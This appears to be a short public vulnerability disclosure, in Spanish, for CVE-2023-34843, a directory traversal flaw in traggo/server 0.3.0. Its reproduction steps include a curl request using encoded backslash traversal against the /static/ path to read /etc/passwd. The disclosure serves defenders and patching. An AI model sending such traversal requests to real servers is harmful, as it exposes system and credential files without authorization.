
Divulgación pública para CVE-2023-34843.
CVE-2023-34843 Divulgación
traggo/server versión 0.3.0 es vulnerable a directory traversal.
Pasos para reproducir:
Configura traggo/server en tu endpoint/servidor. https://traggo.net/install/
Haz una solicitud GET a la siguiente URL. curl -X GET http://localhost:3030/static/..%5c..%5c..%5c..%5cetc/passwd
Ver el contenido de /etc/passwd